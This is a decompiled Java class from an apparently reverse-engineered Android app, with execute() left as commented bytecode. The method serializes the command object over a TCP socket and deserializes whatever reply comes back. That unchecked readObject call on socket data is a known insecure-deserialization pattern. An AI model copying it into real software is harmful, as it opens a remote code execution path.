package com.fx.socket;

import com.vvt.ak.a;
import java.io.Serializable;

public abstract class TcpSocketCmd
  implements Serializable
{
  private static final boolean a = false;
  private static final boolean b = a.e;
  private static final long serialVersionUID = -4869566531156547295L;
  private Object mData;
  private Class mResponseKeyClass;
  
  static
  {
    boolean bool = a.a;
    if (bool) {}
  }
  
  public TcpSocketCmd(Object paramObject, Class paramClass)
  {
    this.mData = paramObject;
    this.mResponseKeyClass = paramClass;
  }
  
  /* Error */
  public Object execute()
  {
    // Byte code:
    //   0: aconst_null
    //   1: astore_1
    //   2: getstatic 24	com/fx/socket/TcpSocketCmd:a	Z
    //   5: istore_2
    //   6: iload_2
    //   7: ifeq +3 -> 10
    //   10: new 39	java/net/Socket
    //   13: astore_3
    //   14: aload_3
    //   15: invokespecial 40	java/net/Socket:<init>	()V
    //   18: getstatic 24	com/fx/socket/TcpSocketCmd:a	Z
    //   21: istore_2
    //   22: iload_2
    //   23: ifeq +3 -> 26
    //   26: new 42	java/net/InetSocketAddress
    //   29: astore 4
    //   31: ldc 44
    //   33: astore 5
    //   35: aload_0
    //   36: invokevirtual 48	com/fx/socket/TcpSocketCmd:getPort	()I
    //   39: istore 6
    //   41: aload 4
    //   43: aload 5
    //   45: iload 6
    //   47: invokespecial 51	java/net/InetSocketAddress:<init>	(Ljava/lang/String;I)V
    //   50: aload_3
    //   51: aload 4
    //   53: invokevirtual 55	java/net/Socket:connect	(Ljava/net/SocketAddress;)V
    //   56: getstatic 24	com/fx/socket/TcpSocketCmd:a	Z
    //   59: istore_2
    //   60: iload_2
    //   61: ifeq +3 -> 64
    //   64: new 57	java/io/ObjectOutputStream
    //   67: astore 7
    //   69: aload_3
    //   70: invokevirtual 61	java/net/Socket:getOutputStream	()Ljava/io/OutputStream;
    //   73: astore 4
    //   75: aload 7
    //   77: aload 4
    //   79: invokespecial 64	java/io/ObjectOutputStream:<init>	(Ljava/io/OutputStream;)V
    //   82: aload 7
    //   84: aload_0
    //   85: invokevirtual 68	java/io/ObjectOutputStream:writeObject	(Ljava/lang/Object;)V
    //   88: aload 7
    //   90: invokevirtual 71	java/io/ObjectOutputStream:flush	()V
    //   93: getstatic 24	com/fx/socket/TcpSocketCmd:a	Z
    //   96: istore_2
    //   97: iload_2
    //   98: ifeq +3 -> 101
    //   101: new 73	java/io/ObjectInputStream
    //   104: astore 5
    //   106: aload_3
    //   107: invokevirtual 77	java/net/Socket:getInputStream	()Ljava/io/InputStream;
    //   110: astore 4
    //   112: aload 5
    //   114: aload 4
    //   116: invokespecial 80	java/io/ObjectInputStream:<init>	(Ljava/io/InputStream;)V
    //   119: aload 5
    //   121: invokevirtual 84	java/io/ObjectInputStream:readObject	()Ljava/lang/Object;
    //   124: astore 4
    //   126: getstatic 24	com/fx/socket/TcpSocketCmd:a	Z
    //   129: istore 8
    //   131: iload 8
    //   133: ifeq +3 -> 136
    //   136: aload_0
    //   137: getfield 37	com/fx/socket/TcpSocketCmd:mResponseKeyClass	Ljava/lang/Class;
    //   140: astore 9
    //   142: aload 9
    //   144: aload 4
    //   146: invokevirtual 90	java/lang/Class:cast	(Ljava/lang/Object;)Ljava/lang/Object;
    //   149: astore 4
    //   151: aload 7
    //   153: ifnull +8 -> 161
    //   156: aload 7
    //   158: invokevirtual 93	java/io/ObjectOutputStream:close	()V
    //   161: aload 5
    //   163: ifnull +8 -> 171
    //   166: aload 5
    //   168: invokevirtual 94	java/io/ObjectInputStream:close	()V
    //   171: aload_3
    //   172: ifnull +7 -> 179
    //   175: aload_3
    //   176: invokevirtual 95	java/net/Socket:close	()V
    //   179: aload_1
    //   180: ifnull +247 -> 427
    //   183: new 97	java/io/IOException
    //   186: astore 4
    //   188: aload_1
    //   189: checkcast 99	java/lang/Exception
    //   192: invokevirtual 103	java/lang/Exception:toString	()Ljava/lang/String;
    //   195: astore_3
    //   196: aload 4
    //   198: aload_3
    //   199: invokespecial 106	java/io/IOException:<init>	(Ljava/lang/String;)V
    //   202: aload 4
    //   204: athrow
    //   205: astore_3
    //   206: getstatic 29	com/fx/socket/TcpSocketCmd:removeFromPath	Z
    //   209: istore 10
    //   211: iload 10
    //   213: ifeq -34 -> 179
    //   216: goto -37 -> 179
    //   219: astore 4
    //   221: iconst_0
    //   222: istore 10
    //   224: aconst_null
    //   225: astore_3
    //   226: aconst_null
    //   227: astore 5
    //   229: iconst_0
    //   230: istore 6
    //   232: aconst_null
    //   233: astore 7
    //   235: aload 4
    //   237: instanceof 97
    //   240: istore 8
    //   242: iload 8
    //   244: ifeq +92 -> 336
    //   247: ldc 108
    //   249: astore 9
    //   251: aload 4
    //   253: checkcast 99	java/lang/Exception
    //   256: invokevirtual 111	java/lang/Exception:getMessage	()Ljava/lang/String;
    //   259: astore 11
    //   261: aload 9
    //   263: aload 11
    //   265: invokevirtual 117	java/lang/String:equals	(Ljava/lang/Object;)Z
    //   268: istore 8
    //   270: iload 8
    //   272: ifeq +64 -> 336
    //   275: iconst_1
    //   276: istore 8
    //   278: iload 8
    //   280: ifne +13 -> 293
    //   283: getstatic 29	com/fx/socket/TcpSocketCmd:removeFromPath	Z
    //   286: istore 8
    //   288: iload 8
    //   290: ifeq +3 -> 293
    //   293: aload 7
    //   295: ifnull +8 -> 303
    //   298: aload 7
    //   300: invokevirtual 93	java/io/ObjectOutputStream:close	()V
    //   303: aload 5
    //   305: ifnull +8 -> 313
    //   308: aload 5
    //   310: invokevirtual 94	java/io/ObjectInputStream:close	()V
    //   313: aload_3
    //   314: ifnull +7 -> 321
    //   317: aload_3
    //   318: invokevirtual 95	java/net/Socket:close	()V
    //   321: aload 4
    //   323: astore 12
    //   325: iconst_0
    //   326: istore_2
    //   327: aconst_null
    //   328: astore 4
    //   330: aload 12
    //   332: astore_1
    //   333: goto -154 -> 179
    //   336: iconst_0
    //   337: istore 8
    //   339: aconst_null
    //   340: astore 9
    //   342: goto -64 -> 278
    //   345: astore_3
    //   346: getstatic 29	com/fx/socket/TcpSocketCmd:removeFromPath	Z
    //   349: istore 10
    //   351: iload 10
    //   353: ifeq +3 -> 356
    //   356: aload 4
    //   358: astore 12
    //   360: iconst_0
    //   361: istore_2
    //   362: aconst_null
    //   363: astore 4
    //   365: aload 12
    //   367: astore_1
    //   368: goto -189 -> 179
    //   371: astore 4
    //   373: iconst_0
    //   374: istore 10
    //   376: aconst_null
    //   377: astore_3
    //   378: iconst_0
    //   379: istore 6
    //   381: aconst_null
    //   382: astore 7
    //   384: aload 7
    //   386: ifnull +8 -> 394
    //   389: aload 7
    //   391: invokevirtual 93	java/io/ObjectOutputStream:close	()V
    //   394: aload_1
    //   395: ifnull +7 -> 402
    //   398: aload_1
    //   399: invokevirtual 94	java/io/ObjectInputStream:close	()V
    //   402: aload_3
    //   403: ifnull +7 -> 410
    //   406: aload_3
    //   407: invokevirtual 95	java/net/Socket:close	()V
    //   410: aload 4
    //   412: athrow
    //   413: astore_3
    //   414: getstatic 29	com/fx/socket/TcpSocketCmd:removeFromPath	Z
    //   417: istore 10
    //   419: iload 10
    //   421: ifeq -11 -> 410
    //   424: goto -14 -> 410
    //   427: getstatic 24	com/fx/socket/TcpSocketCmd:a	Z
    //   430: istore 10
    //   432: iload 10
    //   434: ifeq +3 -> 437
    //   437: aload 4
    //   439: areturn
    //   440: astore 4
    //   442: iconst_0
    //   443: istore 6
    //   445: aconst_null
    //   446: astore 7
    //   448: goto -64 -> 384
    //   451: astore 4
    //   453: goto -69 -> 384
    //   456: astore 4
    //   458: aload 5
    //   460: astore_1
    //   461: goto -77 -> 384
    //   464: astore 4
    //   466: aconst_null
    //   467: astore 5
    //   469: iconst_0
    //   470: istore 6
    //   472: aconst_null
    //   473: astore 7
    //   475: goto -240 -> 235
    //   478: astore 4
    //   480: aconst_null
    //   481: astore 5
    //   483: goto -248 -> 235
    //   486: astore 4
    //   488: goto -253 -> 235
    // Local variable table:
    //   start	length	slot	name	signature
    //   0	491	0	this	TcpSocketCmd
    //   1	460	1	localObject1	Object
    //   5	357	2	bool1	boolean
    //   13	186	3	localObject2	Object
    //   205	1	3	localIOException1	java.io.IOException
    //   225	93	3	localObject3	Object
    //   345	1	3	localIOException2	java.io.IOException
    //   377	30	3	localObject4	Object
    //   413	1	3	localIOException3	java.io.IOException
    //   29	174	4	localObject5	Object
    //   219	103	4	localException1	Exception
    //   328	36	4	localObject6	Object
    //   371	67	4	localObject7	Object
    //   440	1	4	localObject8	Object
    //   451	1	4	localObject9	Object
    //   456	1	4	localObject10	Object
    //   464	1	4	localException2	Exception
    //   478	1	4	localException3	Exception
    //   486	1	4	localException4	Exception
    //   33	449	5	localObject11	Object
    //   39	432	6	i	int
    //   67	407	7	localObjectOutputStream	java.io.ObjectOutputStream
    //   129	209	8	bool2	boolean
    //   140	201	9	localObject12	Object
    //   209	224	10	bool3	boolean
    //   259	5	11	str	String
    //   323	43	12	localObject13	Object
    // Exception table:
    //   from	to	target	type
    //   156	161	205	java/io/IOException
    //   166	171	205	java/io/IOException
    //   175	179	205	java/io/IOException
    //   10	13	219	java/lang/Exception
    //   14	18	219	java/lang/Exception
    //   298	303	345	java/io/IOException
    //   308	313	345	java/io/IOException
    //   317	321	345	java/io/IOException
    //   10	13	371	finally
    //   14	18	371	finally
    //   389	394	413	java/io/IOException
    //   398	402	413	java/io/IOException
    //   406	410	413	java/io/IOException
    //   18	21	440	finally
    //   26	29	440	finally
    //   35	39	440	finally
    //   45	50	440	finally
    //   51	56	440	finally
    //   56	59	440	finally
    //   64	67	440	finally
    //   69	73	440	finally
    //   77	82	440	finally
    //   84	88	451	finally
    //   88	93	451	finally
    //   93	96	451	finally
    //   101	104	451	finally
    //   106	110	451	finally
    //   114	119	451	finally
    //   119	124	456	finally
    //   126	129	456	finally
    //   136	140	456	finally
    //   144	149	456	finally
    //   251	259	456	finally
    //   263	268	456	finally
    //   283	286	456	finally
    //   18	21	464	java/lang/Exception
    //   26	29	464	java/lang/Exception
    //   35	39	464	java/lang/Exception
    //   45	50	464	java/lang/Exception
    //   51	56	464	java/lang/Exception
    //   56	59	464	java/lang/Exception
    //   64	67	464	java/lang/Exception
    //   69	73	464	java/lang/Exception
    //   77	82	464	java/lang/Exception
    //   84	88	478	java/lang/Exception
    //   88	93	478	java/lang/Exception
    //   93	96	478	java/lang/Exception
    //   101	104	478	java/lang/Exception
    //   106	110	478	java/lang/Exception
    //   114	119	478	java/lang/Exception
    //   119	124	486	java/lang/Exception
    //   126	129	486	java/lang/Exception
    //   136	140	486	java/lang/Exception
    //   144	149	486	java/lang/Exception
  }
  
  public Object getData()
  {
    return this.mData;
  }
  
  protected abstract int getPort();
  
  protected abstract String getServerName();
  
  protected abstract String getTag();
}


/* Location:              /Volumes/D1/codebase/android/POC/assets/product/maind/classes-enjarify.jar!/com/fx/socket/TcpSocketCmd.class
 * Java compiler version: 5 (49.0)
 * JD-Core Version:       0.7.1
 */